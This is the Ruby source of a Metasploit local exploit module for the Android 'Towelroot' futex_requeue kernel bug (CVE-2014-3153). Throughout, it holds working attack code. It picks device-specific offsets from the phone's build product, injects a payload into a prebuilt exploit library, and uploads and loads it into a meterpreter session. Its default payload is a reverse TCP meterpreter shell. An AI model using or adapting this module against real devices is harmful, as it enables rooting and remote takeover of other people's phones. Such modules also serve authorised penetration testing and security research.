## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Common def initialize(info={}) super( update_info( info, { 'Name' => "Android 'Towelroot' Futex Requeue Kernel Exploit", 'Description' => %q{ This module exploits a bug in futex_requeue in the Linux kernel, using similar techniques employed by the towelroot exploit. Any Android device with a kernel built before June 2014 is likely to be vulnerable. }, 'License' => MSF_LICENSE, 'Author' => [ 'Pinkie Pie', # discovery 'geohot', # towelroot 'timwr' # metasploit module ], 'References' => [ [ 'CVE', '2014-3153' ], [ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ], [ 'URL', 'http://blog.nativeflow.com/the-futex-vulnerability' ], ], 'DisclosureDate' => "May 03 2014", 'SessionTypes' => [ 'meterpreter' ], 'Platform' => [ "android", "linux" ], 'Payload' => { 'Space' => 2048, }, 'DefaultOptions' => { 'WfsDelay' => 300, 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', }, 'DefaultTarget' => 0, 'Targets' => [ # Automatic targetting via getprop ro.build.model ['Automatic Targeting', { 'auto' => true }], # This is the default setting, Nexus 4, 5, 7, etc ['Default', { 'new_samsung' => false, 'iovstack' => 2, 'offset' => 0, 'force_remove' => false, } ], # Samsung devices, S4, S5, etc ['New Samsung', { 'new_samsung' => true, 'iovstack' => 2, 'offset' => 7380, 'force_remove' => true, } ], # Older Samsung devices, e.g the Note 2 ['Old Samsung', { 'new_samsung' => false, 'iovstack' => 1, 'offset' => 0, 'force_remove' => true, } ], # Samsung Galaxy Grand, etc ['Samsung Grand', { 'new_samsung' => false, 'iovstack' => 5, 'offset' => 0, 'force_remove' => true, } ], ] } )) end def exploit if target['auto'] product = cmd_exec("getprop ro.build.product") fingerprint = cmd_exec("getprop ro.build.fingerprint") print_status("Found device: #{product}") print_status("Fingerprint: #{fingerprint}") if [ "mako", "m7", "hammerhead", "grouper", "Y530-U00", "G6-U10", "g2", "w7n", "D2303", "cancro", ].include? product my_target = targets[1] # Default elsif [ "klte", "jflte", ].include? product my_target = targets[2] # New Samsung elsif [ "t03g", "m0", ].include? product my_target = targets[3] # Old Samsung elsif [ "baffinlite", "Vodafone_785", ].include? product my_target = targets[4] # Samsung Grand else print_status("Could not automatically target #{product}") my_target = targets[1] # Default end else my_target = target end print_status("Using target: #{my_target.name}") local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2014-3153.so" ) exploit_data = File.read(local_file, {:mode => 'rb'}) # Substitute the exploit shellcode with our own space = payload_space payload_encoded = payload.encoded exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space)) # Apply the target config offsets = my_target.opts config_buf = [ offsets['new_samsung'] ? -1 : 0, offsets['iovstack'].to_i, offsets['offset'].to_i, offsets['force_remove'] ? -1 : 0, ].pack('I4') exploit_data.gsub!("c0nfig" + "\x00" * 10, config_buf) workingdir = session.fs.dir.getwd remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}" write_file(remote_file, exploit_data) print_status("Loading exploit library #{remote_file}") session.core.load_library( 'LibraryFilePath' => local_file, 'TargetFilePath' => remote_file, 'UploadLibrary' => false, 'Extension' => false, 'SaveToDisk' => false ) print_status("Loaded library #{remote_file}, deleting") session.fs.file.rm(remote_file) print_status("Waiting #{datastore['WfsDelay']} seconds for payload") end end